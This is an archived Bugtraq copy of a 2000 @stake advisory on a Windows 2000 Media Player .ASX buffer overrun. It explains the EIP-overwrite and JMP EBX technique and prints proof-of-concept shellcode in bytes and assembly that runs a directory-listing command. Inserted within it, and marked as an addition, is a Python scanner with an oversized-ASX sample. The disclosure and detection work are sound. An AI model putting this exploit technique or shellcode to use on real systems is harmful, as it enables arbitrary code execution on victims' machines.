Bugtraq mailing list archives

@stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1)


From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 23 Nov 2000 10:46:11 -0500

                              @stake Inc.
                            www.atstake.com

                           Security Advisory

Advisory Name: Windows 2000 .ASX Buffer Overrun
 Release Date: 11/23/2000
  Application: Microsoft Windows Explorer with
               Microsoft Media Player v6.xx and
               Microsoft Media Player v7.xx.
     Platform: Windows 2000 SP1
     Severity: There is a buffer overflow condition that
               can result in execution of arbitrary code.
      Authors: Ollie Whitehouse [ollie () atstake com]
Vendor Status: vendor has released patch
          Web: www.atstake.com/research/advisories/2000/a112300-1.txt

Overview:

        Microsoft Windows Media Player (http://www.microsoft.com/) plays
streaming media files which have the extension .ASX. There is a buffer
overrun caused by the way that WMP deals with the .ASX file format when
using the Web View option in Windows Explorer (enabled by default). This
problem can allow the execution of arbitrary computer code.

One method of exploitation requires the user to save the .ASX file to the
local machine and navigate to it in Explorer. A single click on the file
causes Explorer to Auto-Preview the destination streaming media file that
is specified in the .ASX file.  Passing an overly long destination for this
media file causes the buffer overrun to occur and the arbitrary code to
execute.

This is another good example of why attachments from unknown sources
should not be trusted, and of why systems/network administrators should
evaluate the types of attachments that are allowed to reach users'
desktops, even those that do not contain any executable code.

There are other methods of exploitation which could allow .ASX files to be
opened automatically when a user visits a malicious web site.  This can be
prevented by configuring Internet Explorer not to run ActiveX controls.
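As a defensive illustration (added here; it is not part of the advisory or
@stake's code), the following Python scans an ASX metafile for REF HREF
values longer than an assumed limit, the kind of check a mail gateway or
desktop scanner could use to quarantine such attachments. The 1024-byte
limit is an assumption; the advisory does not state the overflowing length.

```python
import re

# Assumed threshold: the advisory gives no exact size for the "overly long
# destination", so this limit is a constructed, conservative choice.
MAX_HREF_LEN = 1024

# ASX metafiles are XML-like; the stream location lives in <REF HREF="...">.
# Tags are case-insensitive and real files are often not well-formed XML,
# so a tolerant regex is used instead of a strict XML parser.
_REF_HREF = re.compile(
    r'<\s*ref\b[^>]*?\bhref\s*=\s*(["\'])(.*?)\1',
    re.IGNORECASE,
)


def find_oversized_refs(asx_text, limit=MAX_HREF_LEN):
    """Return (length, first 40 chars) for every REF HREF longer than limit."""
    hits = []
    for m in _REF_HREF.finditer(asx_text):
        href = m.group(2)
        if len(href) > limit:
            hits.append((len(href), href[:40]))
    return hits


def is_suspicious(asx_text, limit=MAX_HREF_LEN):
    """True if the metafile carries at least one oversized destination."""
    return bool(find_oversized_refs(asx_text, limit))


def scan_file(path, limit=MAX_HREF_LEN):
    """Read an .ASX from disk (tolerating odd encodings) and scan it."""
    with open(path, "rb") as fh:
        return find_oversized_refs(fh.read().decode("latin-1"), limit)


# Constructed sample inputs (not the advisory's proof-of-concept file).
BENIGN_ASX = '''<ASX version="3.0">
  <ENTRY><REF HREF="mms://example.invalid/stream.asf"/></ENTRY>
</ASX>'''

OVERSIZED_ASX = ('<asx version="3.0"><entry><ref href="'
                 + "A" * 5000 + '"/></entry></asx>')

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_ASX), ("oversized", OVERSIZED_ASX)):
        print(name, "->", find_oversized_refs(text) or "clean")
```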


Proof of Concept:

        The following file, once uncompressed, contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within
Explorer with a single click, it will cause Microsoft Explorer to create a
file in the root of C: called !test!. This file will contain a directory
listing of the current working directory at the time the proof of concept
is executed. Once this proof of concept is executed, Explorer.exe will
need to be restarted.

This example has been hardcoded to work with Windows 2000 (SP1) and
MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack
specific is that the code is randomly located on the stack (so EIP cannot
be pointed directly to the location of the arbitrary code); EBX, however,
is located 4 bytes before EIP. The example overwrites EIP with the address
of a JMP EBX (FF E2; this instruction is contained in kernel32 and is thus
static).  This in turn executes the value at EBX (which contains NOPs),
then the bytes at EIP (luckily these do not contain any code which alters
or stops program flow), and finally the arbitrary code placed on the
stack.  The assembly code executed by this example at this point is
contained at the end of this advisory. Within the ASX file the example
code is located at offset 00005ce4h.


Proof of concept ASX File:

An ASX file which contains the problem is contained in this .zip file:

 http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

<-----<Assembly code for proof of concept>-----
[Byte Code]                [Assembly]
90                   nop
8B DC                mov         ebx,esp
8B E3                mov         esp,ebx
53                   push        ebx
8B DC                mov         ebx,esp
33 FF                xor         edi,edi

57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi
57                   push        edi

C6 43 E9 63          mov         byte ptr [ebx-17h],63h
C6 43 EA 6D          mov         byte ptr [ebx-16h],6Dh
C6 43 EB 64          mov         byte ptr [ebx-15h],64h
C6 43 EC 2E          mov         byte ptr [ebx-14h],2Eh
C6 43 ED 65          mov         byte ptr [ebx-13h],65h
C6 43 EE 78          mov         byte ptr [ebx-12h],78h
C6 43 EF 65          mov         byte ptr [ebx-11h],65h
C6 43 F0 2F          mov         byte ptr [ebx-10h],2Fh
C6 43 F1 63          mov         byte ptr [ebx-0Fh],63h
C6 43 F2 64          mov         byte ptr [ebx-0Eh],64h
C6 43 F3 69          mov         byte ptr [ebx-0Dh],69h
C6 43 F4 72          mov         byte ptr [ebx-0Ch],72h
C6 43 F5 3E          mov         byte ptr [ebx-0Bh],3Eh
C6 43 F6 63          mov         byte ptr [ebx-0Ah],63h
C6 43 F7 3A          mov         byte ptr [ebx-9],3Ah
C6 43 F8 5C          mov         byte ptr [ebx-8],5Ch
C6 43 F9 21          mov         byte ptr [ebx-7],21h
C6 43 FA 74          mov         byte ptr [ebx-6],74h
C6 43 FB 65          mov         byte ptr [ebx-5],65h
C6 43 FC 73          mov         byte ptr [ebx-4],73h
C6 43 FD 74          mov         byte ptr [ebx-3],74h
C6 43 FE 21          mov         byte ptr [ebx-2],21h

B8 AD AA 01 78       mov         eax,7801AAADh
50                   push        eax
8D 43 E9             lea         eax,[ebx-17h]
50                   push        eax
FF 53 E4             call        dword ptr [ebx-1Ch]
56                   push        esi

BB 2D F3 E8 77       mov         ebx,77E8F32Dh
FF D3                call        ebx
C3                   ret
<-----<End of code for proof of concept>-----


Vendor Response:
        
Microsoft has released a security bulletin describing the issue:

 http://www.microsoft.com/technet/security/bulletin/MS00-090.asp

Microsoft has released patches for Windows Media Player:

 Windows Media Player 6.4:
 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

 Windows Media Player 7:
 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067


Recommendation:

The best solution is to install the vendor patch for your version of the
media player.  This solves this specific problem.

In general, unless you need to run ActiveX controls, it is a good idea to
configure Internet Explorer not to run them.  At the very least you can
configure IE to not run ActiveX controls in the Internet Security Zone.
It doesn't matter whether the controls are signed or not.  As you can see
from this advisory, even signed controls can have security problems.

Of course, never trust attachments from unknown sources, even data files
such as the .ASX files discussed in this advisory.
        
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc

Copyright 2000 @stake, Inc. All rights reserved.

